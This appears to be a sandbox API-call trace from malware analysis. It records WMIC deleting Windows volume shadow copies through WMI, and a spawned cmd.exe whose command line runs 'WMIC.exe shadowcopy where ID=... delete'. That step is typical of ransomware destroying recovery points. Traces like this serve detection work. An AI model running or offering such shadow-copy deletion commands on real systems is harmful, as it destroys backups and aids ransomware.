cchCount2=4) returned 1 [0120.147] lstrlenW (lpString="ASSOC") returned 5 [0120.147] lstrlenW (lpString="delete") returned 6 [0120.147] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0120.147] WbemLocator:IUnknown:AddRef (This=0x1e21390) returned 0x3 [0120.147] free (_Block=0x28dfb0) [0120.147] lstrlenW (lpString="") returned 0 [0120.147] lstrlenW (lpString="XDUWTFONO") returned 9 [0120.147] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0120.147] lstrlenW (lpString="XDUWTFONO") returned 9 [0120.147] malloc (_Size=0x14) returned 0x41cb80 [0120.147] lstrlenW (lpString="XDUWTFONO") returned 9 [0120.147] GetCurrentThreadId () returned 0xb74 [0120.147] GetCurrentProcess () returned 0xffffffffffffffff [0120.147] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x16f820 | out: TokenHandle=0x16f820*=0x27c) returned 1 [0120.148] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16f818 | out: TokenInformation=0x0, ReturnLength=0x16f818) returned 0 [0120.148] malloc (_Size=0x118) returned 0x41d080 [0120.148] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x41d080, TokenInformationLength=0x118, ReturnLength=0x16f818 | out: TokenInformation=0x41d080, ReturnLength=0x16f818) returned 1 [0120.148] AdjustTokenPrivileges (in: TokenHandle=0x27c, DisableAllPrivileges=0, NewState=0x41d080*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-784921622, Attributes=0xf3b7), (Luid.LowPart=0x0, Luid.HighPart=4312816, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0120.148] free (_Block=0x41d080) [0120.148] CloseHandle (hObject=0x27c) returned 1 [0120.148] lstrlenW (lpString="GET") returned 3 [0120.148] lstrlenW (lpString="delete") returned 6 [0120.148] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0120.148] lstrlenW (lpString="LIST") returned 4 [0120.148] lstrlenW (lpString="delete") returned 6 [0120.148] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0120.148] lstrlenW (lpString="SET") returned 3 [0120.148] lstrlenW (lpString="delete") returned 6 [0120.148] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0120.148] lstrlenW (lpString="CALL") returned 4 [0120.148] lstrlenW (lpString="delete") returned 6 [0120.149] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0120.149] lstrlenW (lpString="ASSOC") returned 5 [0120.149] lstrlenW (lpString="delete") returned 6 [0120.149] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0120.149] lstrlenW (lpString="CREATE") returned 6 [0120.149] lstrlenW (lpString="delete") returned 6 [0120.149] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0120.149] lstrlenW (lpString="DELETE") returned 6 [0120.149] lstrlenW (lpString="delete") returned 6 [0120.149] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0120.149] malloc (_Size=0x18) returned 0x41cc00 [0120.149] lstrlenA (lpString="") returned 0 [0120.149] malloc (_Size=0x2) returned 0x28dfb0 [0120.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff8b314c, cbMultiByte=-1, lpWideCharStr=0x28dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0120.149] free (_Block=0x28dfb0) [0120.149] malloc (_Size=0x18) returned 0x41cca0 [0120.149] lstrlenA (lpString="") returned 0 [0120.149] malloc (_Size=0x2) returned 0x28dfb0 [0120.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff8b314c, cbMultiByte=-1, lpWideCharStr=0x28dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0120.149] free (_Block=0x28dfb0) [0120.149] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0120.149] malloc (_Size=0x3e) returned 0x41d080 [0120.150] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0120.150] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0120.150] malloc (_Size=0x18) returned 0x41cba0 [0120.150] free (_Block=0x41cca0) [0120.150] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3f006e0007 | out: _String=0x0, _Context=0x3f006e0007) returned="*" [0120.150] lstrlenW (lpString="FROM") returned 4 [0120.150] lstrlenW (lpString="*") returned 1 [0120.150] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0120.150] malloc (_Size=0x18) returned 0x41cca0 [0120.150] free (_Block=0x41cba0) [0120.150] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x40006e0007 | out: _String=0x0, _Context=0x40006e0007) returned="from" [0120.150] lstrlenW (lpString="FROM") returned 4 [0120.150] lstrlenW (lpString="from") returned 4 [0120.150] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0120.150] malloc (_Size=0x18) returned 0x41cba0 [0120.150] free (_Block=0x41cca0) [0120.150] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x41006e0007 | out: _String=0x0, _Context=0x41006e0007) returned="Win32_ShadowCopy" [0120.150] malloc (_Size=0x18) returned 0x41cca0 [0120.150] free (_Block=0x41cba0) [0120.150] free (_Block=0x41d080) [0120.150] malloc (_Size=0x18) returned 0x41cba0 [0120.151] malloc (_Size=0x18) returned 0x41cc20 [0120.151] malloc (_Size=0x18) returned 0x41cc40 [0120.151] malloc (_Size=0x18) returned 0x41cc60 [0120.151] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0120.151] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0120.151] malloc (_Size=0x18) returned 0x41cc80 [0120.151] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0120.151] SysStringLen (param_1=" WHERE ") returned 0x7 [0120.151] malloc (_Size=0x18) returned 0x41ccc0 [0120.151] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ") returned 0x25 [0120.151] SysStringLen (param_1="ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'") returned 0x2b [0120.152] free (_Block=0x41cc00) [0120.152] free (_Block=0x41cc80) [0120.152] free (_Block=0x41cc60) [0120.152] free (_Block=0x41cc40) [0120.152] free (_Block=0x41cc20) [0120.152] free (_Block=0x41cba0) [0120.152] ??0CHString@@QEAA@XZ () returned 0x16f790 [0120.152] GetCurrentThreadId () returned 0xb74 [0120.152] malloc (_Size=0x18) returned 0x41cba0 [0120.152] malloc (_Size=0x18) returned 0x41cc20 [0120.152] malloc (_Size=0x18) returned 0x41cc40 [0120.152] malloc (_Size=0x18) returned 0x41cc60 [0120.152] malloc (_Size=0x18) returned 0x41cc80 [0120.152] SysStringLen (param_1="\\\\") returned 0x2 [0120.152] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0120.152] malloc (_Size=0x18) returned 0x41cc00 [0120.152] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0120.152] SysStringLen (param_1="\\") returned 0x1 [0120.153] malloc (_Size=0x18) returned 0x41cce0 [0120.153] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0120.153] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0120.153] free (_Block=0x41cc00) [0120.153] free (_Block=0x41cc80) [0120.153] free (_Block=0x41cc60) [0120.153] free (_Block=0x41cc40) [0120.153] free (_Block=0x41cc20) [0120.153] free (_Block=0x41cba0) [0120.153] malloc (_Size=0x18) returned 0x41cba0 [0120.153] malloc (_Size=0x18) returned 0x41cc20 [0120.153] malloc (_Size=0x18) returned 0x41cc40 [0120.153] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e21390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff9229d0 | out: ppNamespace=0xff9229d0*=0x1e33c18) returned 0x0 [0120.156] free (_Block=0x41cc40) [0120.156] free (_Block=0x41cc20) [0120.156] free (_Block=0x41cba0) [0120.156] CoSetProxyBlanket (pProxy=0x1e33c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0120.157] free (_Block=0x41cce0) [0120.157] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0120.157] ??0CHString@@QEAA@XZ () returned 0x16f6e0 [0120.157] GetCurrentThreadId () returned 0xb74 [0120.157] malloc (_Size=0x18) returned 0x41cce0 [0120.157] lstrlenA (lpString="") returned 0 [0120.157] malloc (_Size=0x2) returned 0x28dfb0 [0120.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff8b314c, cbMultiByte=-1, lpWideCharStr=0x28dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0120.157] free (_Block=0x28dfb0) [0120.157] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'") returned 0x50 [0120.157] SysStringLen (param_1="") returned 0x0 [0120.157] free (_Block=0x41cce0) [0120.157] malloc (_Size=0x18) returned 0x41cce0 [0120.157] IWbemServices:ExecQuery (in: This=0x1e33c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy WHERE ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'", lFlags=0, pCtx=0x0, ppEnum=0x16f6e8 | out: ppEnum=0x16f6e8*=0x1e33d18) returned 0x0 [0120.186] free (_Block=0x41cce0) [0120.186] CoSetProxyBlanket (pProxy=0x1e33d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0120.189] IEnumWbemClassObject:Next (in: This=0x1e33d18, lTimeout=-1, uCount=0x1, apObjects=0x16f6f0, puReturned=0x16f700 | out: apObjects=0x16f6f0*=0x1e33d80, puReturned=0x16f700*=0x1) returned 0x0 [0120.191] malloc (_Size=0x18) returned 0x41cce0 [0120.191] IWbemClassObject:Get (in: This=0x1e33d80, wszName="__PATH", lFlags=0, pVal=0x16f710*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f710*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{5555A914-627B-4AF5-A342-EC1A6421363A}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.191] free (_Block=0x41cce0) [0120.191] malloc (_Size=0x800) returned 0x41d080 [0120.191] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x41d080, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0120.191] FormatMessageW (in: dwFlags=0x2500, lpSource=0x41d080, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x16f638, nSize=0x0, Arguments=0x16f648 | out: lpBuffer="뚐 ") returned 0x67 [0120.191] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{5555A914-627B-4AF5-A342-EC1A6421363A}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0120.191] malloc (_Size=0x68) returned 0x41d890 [0120.191] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{5555A914-627B-4AF5-A342-EC1A6421363A}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x41d890, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{5555A914-627B-4AF5-A342-EC1A6421363A}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0120.191] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff922ab0 [0120.191] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0120.192] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0120.192] free (_Block=0x41d890) [0120.192] free (_Block=0x41d080) [0120.192] LocalFree (hMem=0x20b690) returned 0x0 [0120.192] IWbemServices:DeleteInstance (in: This=0x1e33c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{5555A914-627B-4AF5-A342-EC1A6421363A}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0121.221] IUnknown:Release (This=0x1e33d80) returned 0x0 [0121.221] malloc (_Size=0x800) returned 0x41d080 [0121.221] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x41d080, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0121.221] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0121.221] malloc (_Size=0x20) returned 0x41cef0 [0121.221] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x41cef0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0121.221] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff922ab0 [0121.221] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0121.221] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0121.221] free (_Block=0x41cef0) [0121.221] free (_Block=0x41d080) [0121.221] IEnumWbemClassObject:Next (in: This=0x1e33d18, lTimeout=-1, uCount=0x1, apObjects=0x16f6f0, puReturned=0x16f700 | out: apObjects=0x16f6f0*=0x0, puReturned=0x16f700*=0x0) returned 0x1 [0121.222] IUnknown:Release (This=0x1e33d18) returned 0x0 [0121.222] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0121.223] free (_Block=0x41cca0) [0121.223] free (_Block=0x41ccc0) [0121.223] GetCurrentThreadId () returned 0xb74 [0121.223] ??0CHString@@QEAA@PEBG@Z () returned 0x16f8c8 [0121.223] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x16f8c8 [0121.223] lstrlenW (lpString="LIST") returned 4 [0121.223] lstrlenW (lpString="delete") returned 6 [0121.223] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0121.223] lstrlenW (lpString="ASSOC") returned 5 [0121.223] lstrlenW (lpString="delete") returned 6 [0121.223] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0121.223] lstrlenW (lpString="GET") returned 3 [0121.223] lstrlenW (lpString="delete") returned 6 [0121.223] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0121.223] ??1CHString@@QEAA@XZ () returned 0x30370901 [0121.223] WbemLocator:IUnknown:Release (This=0x1e33c18) returned 0x0 [0121.223] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0121.223] _kbhit () returned 0x0 [0121.224] free (_Block=0x416f20) [0121.224] free (_Block=0x41cac0) [0121.224] free (_Block=0x41caa0) [0121.224] free (_Block=0x41ca80) [0121.224] free (_Block=0x41ca60) [0121.224] free (_Block=0x4170a0) [0121.224] free (_Block=0x41cb40) [0121.224] free (_Block=0x4185c0) [0121.224] free (_Block=0x41d020) [0121.224] free (_Block=0x41cbc0) [0121.224] free (_Block=0x41cfa0) [0121.224] free (_Block=0x41cae0) [0121.224] free (_Block=0x41cbe0) [0121.224] free (_Block=0x417140) [0121.224] free (_Block=0x416e00) [0121.224] free (_Block=0x41cff0) [0121.225] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0121.225] free (_Block=0x41ce20) [0121.225] free (_Block=0x41cb00) [0121.225] free (_Block=0x41cb20) [0121.225] free (_Block=0x41cf30) [0121.225] free (_Block=0x41cb60) [0121.225] free (_Block=0x417ee0) [0121.225] free (_Block=0x417f30) [0121.225] free (_Block=0x417f80) [0121.225] free (_Block=0x41cb80) [0121.225] free (_Block=0x416a20) [0121.225] free (_Block=0x416de0) [0121.225] free (_Block=0x418040) [0121.225] free (_Block=0x416dc0) [0121.225] free (_Block=0x418000) [0121.225] free (_Block=0x416d60) [0121.225] free (_Block=0x416d80) [0121.225] free (_Block=0x416c40) [0121.225] free (_Block=0x416c60) [0121.225] free (_Block=0x416be0) [0121.225] free (_Block=0x416c00) [0121.225] free (_Block=0x416ca0) [0121.225] free (_Block=0x416cc0) [0121.225] free (_Block=0x416d00) [0121.225] free (_Block=0x416d20) [0121.226] free (_Block=0x416b20) [0121.226] free (_Block=0x416b40) [0121.226] free (_Block=0x416ac0) [0121.226] free (_Block=0x416ae0) [0121.226] free (_Block=0x416b80) [0121.226] free (_Block=0x416ba0) [0121.226] free (_Block=0x416a60) [0121.226] free (_Block=0x416a80) [0121.226] free (_Block=0x4169d0) [0121.226] free (_Block=0x4169a0) [0121.226] free (_Block=0x416e90) [0121.226] WbemLocator:IUnknown:Release (This=0x1e21390) returned 0x2 [0121.226] WbemLocator:IUnknown:Release (This=0x1e33b28) returned 0x0 [0121.226] WbemLocator:IUnknown:Release (This=0x1e33a98) returned 0x0 [0121.227] WbemLocator:IUnknown:Release (This=0x1e21390) returned 0x1 [0121.227] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0121.227] WbemLocator:IUnknown:Release (This=0x1e21390) returned 0x0 [0121.227] free (_Block=0x41c9e0) [0121.227] free (_Block=0x41ca00) [0121.227] free (_Block=0x418540) [0121.227] free (_Block=0x41ca20) [0121.227] free (_Block=0x41ca40) [0121.227] free (_Block=0x418580) [0121.227] free (_Block=0x41c860) [0121.227] free (_Block=0x41c880) [0121.227] free (_Block=0x4183c0) [0121.227] free (_Block=0x41c8a0) [0121.227] free (_Block=0x41c8c0) [0121.227] free (_Block=0x418400) [0121.227] free (_Block=0x41c7e0) [0121.227] free (_Block=0x41c800) [0121.227] free (_Block=0x418340) [0121.227] free (_Block=0x41c820) [0121.227] free (_Block=0x41c840) [0121.228] free (_Block=0x418380) [0121.228] free (_Block=0x41c960) [0121.228] free (_Block=0x41c980) [0121.228] free (_Block=0x4184c0) [0121.228] free (_Block=0x41c9a0) [0121.228] free (_Block=0x41c9c0) [0121.228] free (_Block=0x418500) [0121.228] free (_Block=0x41c760) [0121.228] free (_Block=0x41c780) [0121.228] free (_Block=0x4182c0) [0121.228] free (_Block=0x41c7a0) [0121.228] free (_Block=0x41c7c0) [0121.228] free (_Block=0x418300) [0121.228] free (_Block=0x41c8e0) [0121.229] free (_Block=0x41c900) [0121.229] free (_Block=0x418440) [0121.229] free (_Block=0x41c920) [0121.229] free (_Block=0x41c940) [0121.229] free (_Block=0x418480) [0121.229] free (_Block=0x41c6a0) [0121.229] free (_Block=0x41c6c0) [0121.229] free (_Block=0x418200) [0121.229] free (_Block=0x41c560) [0121.229] free (_Block=0x41c580) [0121.229] free (_Block=0x4180c0) [0121.229] free (_Block=0x416e50) [0121.229] free (_Block=0x416e70) [0121.229] free (_Block=0x418080) [0121.229] free (_Block=0x41c5e0) [0121.229] free (_Block=0x41c600) [0121.229] free (_Block=0x418140) [0121.229] free (_Block=0x41c6e0) [0121.229] free (_Block=0x41c700) [0121.229] free (_Block=0x418240) [0121.229] free (_Block=0x41c5a0) [0121.229] free (_Block=0x41c5c0) [0121.229] free (_Block=0x418100) [0121.230] free (_Block=0x41c620) [0121.230] free (_Block=0x41c640) [0121.230] free (_Block=0x418180) [0121.230] free (_Block=0x41c660) [0121.230] free (_Block=0x41c680) [0121.230] free (_Block=0x4181c0) [0121.230] free (_Block=0x41c720) [0121.230] free (_Block=0x41c740) [0121.230] free (_Block=0x418280) [0121.230] CoUninitialize () [0121.254] exit (_Code=0) [0121.254] free (_Block=0x41cd30) [0121.254] free (_Block=0x417ea0) [0121.254] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0121.254] free (_Block=0x416f40) [0121.254] free (_Block=0x416a40) [0121.254] free (_Block=0x417e60) [0121.254] free (_Block=0x417e20) [0121.254] free (_Block=0x417dd0) [0121.254] free (_Block=0x417d90) [0121.254] free (_Block=0x417d30) [0121.254] free (_Block=0x415a90) [0121.254] free (_Block=0x415a50) [0121.254] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0121.254] free (_Block=0x41cec0) Thread: id = 239 os_tid = 0xad8 Thread: id = 240 os_tid = 0x83c Thread: id = 241 os_tid = 0x688 Thread: id = 242 os_tid = 0x5b8 Thread: id = 243 os_tid = 0x3f8 Process: id = "46" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x24430000" os_pid = "0xb0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xaec" cmd_line = "cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{C7241040-5C13-409D-A239-55D005C03DE9}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 244 os_tid = 0x114 [0121.360] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f8b0 | out: lpSystemTimeAsFileTime=0x28f8b0*(dwLowDateTime=0x4fc47630, dwHighDateTime=0x1d68245)) [0121.360] GetCurrentProcessId () returned 0xb0c [0121.360] GetCurrentThreadId () returned 0x114 [0121.360] GetTickCount () returned 0x1153dbc [0121.360] QueryPerformanceCounter (in: lpPerformanceCount=0x28f8b8 | out: lpPerformanceCount=0x28f8b8*=24125353160) returned 1 [0121.361] GetModuleHandleW (lpModuleName=0x0) returned 0x4a860000 [0121.361] __set_app_type (_Type=0x1) [0121.361] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a887810) returned 0x0 [0121.361] __getmainargs (in: _Argc=0x4a8aa608, _Argv=0x4a8aa618, _Env=0x4a8aa610, _DoWildCard=0, _StartInfo=0x4a88e0f4 | out: _Argc=0x4a8aa608, _Argv=0x4a8aa618, _Env=0x4a8aa610) returned 0 [0121.361] GetCurrentThreadId () returned 0x114 [0121.361] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x114) returned 0x3c [0121.361] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0121.361] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0121.361] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0121.362] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0121.362] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f848 | out: phkResult=0x28f848*=0x0) returned 0x2 [0121.362] VirtualQuery (in: lpAddress=0x28f830, lpBuffer=0x28f7b0, dwLength=0x30 | out: lpBuffer=0x28f7b0*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0121.362] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28f7b0, dwLength=0x30 | out: lpBuffer=0x28f7b0*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0121.362] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f7b0, dwLength=0x30 | out: lpBuffer=0x28f7b0*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0121.362] VirtualQuery (in: lpAddress=0x194000, lpBuffer=0x28f7b0, dwLength=0x30 | out: lpBuffer=0x28f7b0*(BaseAddress=0x194000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0121.362] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f7b0, dwLength=0x30 | out: lpBuffer=0x28f7b0*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0121.362] GetConsoleOutputCP () returned 0x1b5 [0121.362] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a89bfe0 | out: lpCPInfo=0x4a89bfe0) returned 1 [0121.363] SetConsoleCtrlHandler (HandlerRoutine=0x4a883184, Add=1) returned 1 [0121.363] _get_osfhandle (_FileHandle=1) returned 0x7 [0121.363] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0121.363] _get_osfhandle (_FileHandle=1) returned 0x7 [0121.363] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a88e194 | out: lpMode=0x4a88e194) returned 1 [0121.363] _get_osfhandle (_FileHandle=1) returned 0x7 [0121.363] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0121.363] _get_osfhandle (_FileHandle=0) returned 0x3 [0121.363] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a88e198 | out: lpMode=0x4a88e198) returned 1 